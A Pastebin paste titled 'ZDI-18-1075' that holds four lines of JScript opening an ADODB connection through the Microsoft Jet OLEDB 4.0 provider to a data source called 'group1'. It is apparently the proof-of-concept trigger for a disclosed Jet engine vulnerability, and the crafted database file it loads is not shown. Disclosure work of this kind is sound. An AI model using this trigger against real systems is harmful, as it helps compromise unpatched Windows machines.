TVT618

ZDI-18-1075

Sep 24th, 2018
405
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var con = new ActiveXObject("ADODB.Connection");
  2. con.Provider = "Microsoft.Jet.OLEDB.4.0";
  3. con.ConnectionString = "Data Source=" + "group1";
  4. con.Open();
Advertisement
Add Comment
Please, Sign In to add comment